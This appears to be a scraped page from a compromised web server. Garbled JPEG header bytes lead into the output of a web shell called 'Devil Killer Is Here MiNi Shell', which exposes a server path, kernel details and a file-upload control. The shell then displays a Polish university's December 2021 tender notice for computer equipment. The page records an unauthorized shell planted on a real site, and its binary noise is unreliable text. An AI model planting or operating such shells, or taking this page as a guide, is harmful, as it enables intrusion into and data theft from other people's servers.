JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211230/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211230/0033973701-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa sprzętu komputerowego </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Akademia Zamojska</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 060044114</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Pereca 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Zamość</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">22-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL812 - Chełmsko-zamojski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">84 638 34 44</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">rektorat@akademiazamojska.edu.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://upz.edu.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - uczelnia publiczna</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa sprzętu komputerowego </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-3a7acbfb-6957-11ec-ae77-fe331fedffdc</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00339737</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-12-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00123447/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.4 Dostawa sprzętu komputerowego z podziałem na części: dostaw komputerów przenośnych; dostawa zestawów komputerowych; dostawa skanera</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Projekt: „Uczelnia Państwowa im. Szymona Szymonowica w Zamościu - uczelnia dostępna dla Wszystkich!”, współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego; Projekt „Wdrożenie programu rozwojowego i uruchomienie działalności Monoprofilowego Centrum Symulacji Medycznej na Uczelni Państwowej w Zamościu&#34; dofinansowanego z Europejskiego Funduszu Społecznego </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://upz-zamosc.ezamawiajacy.pl/servlet/HomeServlet <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W przedmiotowym postępowaniu komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu Platformy znajdującej się pod adresem https://upz-zamosc.ezamawiajacy.pl/servlet/HomeServlet</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania zostały określone w SWZ</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://upz-zamosc.ezamawiajacy.pl/servlet/HomeServlet</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający oświadcza, iż będąc administratorem danych oraz mając na względzie przepisy ustawy z dnia 10 maja 2018 r. o ochronie danych osobowych oraz rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia<br/>27kwietnia 2016 r. (dalej „RODO”), wdrożył środki bezpieczeństwa adekwatne do zidentyfikowanych przez siebie ryzyk ora zdające rękojmie należytego zabezpieczenia danych osobowych przekazywanych w ramach postępowania. Szczegółowa klauzula informacyjna z art.13 RODO zawarta jest w SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">AI. 0920.08.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Opis przedmiotu zamówienia stanowi załącznik 1.1 SWZ dot. 1 części zamówienia dostawa komputerów przenośnych </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30236000-2 - Różny sprzęt komputerowy</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30213100-6 - Komputery przenośne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">90 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą liczbę punktów, uzyskaną łącznie we wszystkich kryteriach oceny ofert</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> opis przedmiotu zamówienia stanowi załącznik 1.2 do SWZ Część 2 zamówienia: dostawa zestawów komputerowych </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30236000-2 - Różny sprzęt komputerowy</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30213000-5 - Komputery osobiste</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">90 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą liczbę punktów, uzyskaną łącznie we wszystkich kryteriach oceny ofert</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> załącznik nr 1.3 do SWZ: Część 3 zamówienia: dostawa skanera </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30236000-2 - Różny sprzęt komputerowy</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30216110-0 - Skanery komputerowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">90 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">a najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą liczbę punktów, uzyskaną łącznie we wszystkich kryteriach oceny ofert</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.	Do oferty Wykonawca dołącza oświadczenie składane na podstawie art. 125 ust. 1 oraz art. 273 ust. 2 ustawy Pzp o niepodleganiu wykluczeniu, spełnianiu warunków udziału w postępowaniu w zakresie wskazanym przez Zamawiającego –- zgodnie ze wzorem stanowiącym załącznik nr 5 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.	Do oferty Wykonawca dołącza oświadczenie składane na podstawie art. 125 ust. 1 oraz art. 273 ust. 2 ustawy Pzp o niepodleganiu wykluczeniu, spełnianiu warunków udziału w postępowaniu w zakresie wskazanym przez Zamawiającego –- zgodnie ze wzorem stanowiącym załącznik nr 5 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> W związku z ograniczoną liczba znaków przedmiotowe środki dowodowe zostały opisane w rozdziale VI pkt 11SWZ.<br/>Część1:L.TYPA: C.ISO9001dla producenta sprzętu,C.ISO1400dlaproducentasprzętu,C.ISO9001naświadczenie usługserwisowychdlfirmyświadczącejserwisgwarancyjny,Dek.CE,Wydrukzestronylubcertyfikatpotwierdzający kompatybilnośćkomputeranadanaplatformę systemową,C.TCOdlasprzętukomputerowego;L.TYPB:C.ISO9001dlaproducentasprzętu;C.ISO14001dlaproducentasprzętu;C.ISO9001naświadczenieusługserwisowychdlafirmyświadczącejserwisgwarancyjny;DeklaracjazgodnościCE;Wydrukzestronylubcertyfikatpotwierdzającykompatybilnośćkomputeranadanaplatformęsystemową;C.TCOdlasprzętukomputerowego;L.TYPD:C.ISO9001dlaproducentasprzętu;C.ISO14001dlaproducentasprzętu;C.ISO9001naświadczenieusługserwisowychdlafirmyświadczącejerwisgwarancyjny;DeklaracjazgodnościCE;wydrukzestronylubcertyfikatpotwierdzający kompatybilnośćkomputeranadanaplatformęsystemową;C.TCOdlasprzętukomputerowego;Oświadczenieproducentajednostkiozgodnośćz dyrektywąRoHSUEoeliminacjisubstancjiniebezpiecznych; Część2:Z.TYPA:C.ISO9001dlaproducentasprzętu;Dek.CE;Urządzeniawyprodukowanesąprzezproducenta, zgodnie znormąPNENISO50001;Potwierdzeniespełnieniakryteriówśrodowiskowych,wtymzgodnościzdyrektywąRoHSUEoeliminacjisubstancjiniebezpiecznychwpostacioświadczeniaproducentajednostki;GłośnośćjednostkicentralnejmierzonazgodnieznormąISO7779orazwykazanazgodnieznormąISO9296wpozycjiobserwatoraw trybiepracydyskutwardego(IDLE)wynoszącamaksymalnie26dB(załączyćoświadczenieproducenta);F.serwisująca musiposiadać ISO9001 naświadczenieusług serwisowychorazposiadaćautoryzacjeproducenta urządzeń (c. ISO 9001);oświadczeniaProducentapotwierdzając,żeserwisurządzeńbędzierealizowanybezpośrednioprzezProducentai/lubwewspółpracyzAutoryzowanymPartneremSerwisowymProducenta;wydrukupotwierdzający certyfikacjęrodzinyproduktów;Zamawiającywymagaodpodmioturealizującegoserwislubproducentasprzętudołączeniadoofertyoświadczenia,żewprzypadkuwystąpieniaawariidyskutwardegowrządzeniuobjętymaktywnymwparciemtechnicznym,uszkodzonydysktwardypozostajeuZamawiającego;M.:f.serwisującamusiposiadaćautoryzację producentaoraz ISO9001 na świadczenie usług serwisowych(c.ISO9001);Z.TYPB:C.ISO9001dla producentasprzętu,Dek.CE;Urządzeniawyprodukowanesąprzezproducenta,zgodnieznormąPN-ENISO50001;C.TCO,wymaganacertyfikacjanastronie: http://tcocertified.com/product-finder/załączyćdo ofertywydruk zestrony lub certyfikat;Potwierdzeniespełnieniakryteriów środowiskowych,wtymzgodnościzdyrektywąRoHSUE oeliminacji substancjiniebezpiecznych wpostacioświadczeniaproducentajednostki;F. serwisującamusi posiadaćISO9001naświadczenieusługserwisowychorazposiadać autoryzacjeproducenta urządzeń (certyfikatISO 9001);Wymaganedołączeniedo ofertyoświadczenia Producentapotwierdzając,żeSerwisurządzeńbędzierealizowany bezpośrednioprzezProducentai/lubwewspółpracy zAutoryzowanymPartneremSerwisowymProducenta;Oferowanemodelekomputerówmusząpoprawnie współpracowaćzzamawianymisystemamioperacyjnymi Wykonawcazałączydoofertywydrukzestronypotwierdzającykompatybilność komputeranadanaplatformęsystemową;doofertynależydołączyćlinkstronypotwierdzającydostępdonajnowszychsterownikówiuaktualnieńnastronieproducentazestawurealizowanypoprzezpodanienadedykowanejstronieinternetowejproducentanumeruseryjnegolubmodelukomputera;Z.TYPC:C.ISO9001dlaproducentasprzętu;Dek.CE(doofertynależyzałączyćdeklarację);Urządzeniawyprodukowaneprzezproducenta,zgodnieznormąPN-ENISO50001(certyfikat);C.TCOdlakomputerawymaganacertyfikacjanastronie:http://tcocertified.com/product-finder/wydrukzestronylubcertyfikat;ZgodnośćzdyrektywąRoHSUEoeliminacjisubstancjiniebezpiecznych(oświadczenieproducentalubWykonawcy);CISO9001naświadczenieusługserwisowych dlaf.świadczącejserwisgwarancyjny(c.ISO9001);OświadczenieProducentapotwierdzając,żeSerwisurządzeńbędzie realizowanybezpośrednioprzezProducentai/lubweMwspółpracyzAutoryzowanymPartneremSerwisowymProducenta;Potwierdzeniekompatybilnościkomputerazoferowanymsystememoperacyjnymwydrukzestrony lubcertyfikat; <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> opisane w rozdziale VI pkt 11SWZ.<br/>Część1:L.TYPA: C.ISO9001dla producenta sprzętu,C.ISO1400dlaproducentasprzętu,C.ISO9001naświadczenie usługserwisowychdlfirmyświadczącejserwisgwarancyjny,Dek.CE,Wydrukzestronylubcertyfikatpotwierdzający kompatybilnośćkomputeranadanaplatformę systemową,C.TCOdlasprzętukomputerowego;L.TYPB:C.ISO9001dlaproducentasprzętu;C.ISO14001dlaproducentasprzętu;C.ISO9001naświadczenieusługserwisowychdlafirmyświadczącejserwisgwarancyjny;DeklaracjazgodnościCE;Wydrukzestronylubcertyfikatpotwierdzającykompatybilnośćkomputeranadanaplatformęsystemową;C.TCOdlasprzętukomputerowego;L.TYPD:C.ISO9001dlaproducentasprzętu;C.ISO14001dlaproducentasprzętu;C.ISO9001naświadczenieusługserwisowychdlafirmyświadczącejerwisgwarancyjny;DeklaracjazgodnościCE;wydrukzestronylubcertyfikatpotwierdzający kompatybilnośćkomputeranadanaplatformęsystemową;C.TCOdlasprzętukomputerowego;Oświadczenieproducentajednostkiozgodnośćz dyrektywąRoHSUEoeliminacjisubstancjiniebezpiecznych; Część2:Z.TYPA:C.ISO9001dlaproducentasprzętu;Dek.CE;Urządzeniawyprodukowanesąprzezproducenta, zgodnie znormąPNENISO50001;Potwierdzeniespełnieniakryteriówśrodowiskowych,wtymzgodnościzdyrektywąRoHSUEoeliminacjisubstancjiniebezpiecznychwpostacioświadczeniaproducentajednostki;GłośnośćjednostkicentralnejmierzonazgodnieznormąISO7779orazwykazanazgodnieznormąISO9296wpozycjiobserwatoraw trybiepracydyskutwardego(IDLE)wynoszącamaksymalnie26dB(załączyćoświadczenieproducenta);F.serwisująca musiposiadać ISO9001 naświadczenieusług serwisowychorazposiadaćautoryzacjeproducenta urządzeń (c. ISO 9001);oświadczeniaProducentapotwierdzając,żeserwisurządzeńbędzierealizowanybezpośrednioprzezProducentai/lubwewspółpracyzAutoryzowanymPartneremSerwisowymProducenta;wydrukupotwierdzający certyfikacjęrodzinyproduktów;Zamawiającywymagaodpodmioturealizującegoserwislubproducentasprzętudołączeniadoofertyoświadczenia,żewprzypadkuwystąpieniaawariidyskutwardegowrządzeniuobjętymaktywnymwparciemtechnicznym,uszkodzonydysktwardypozostajeuZamawiającego;M.:f.serwisującamusiposiadaćautoryzację producentaoraz ISO9001 na świadczenie usług 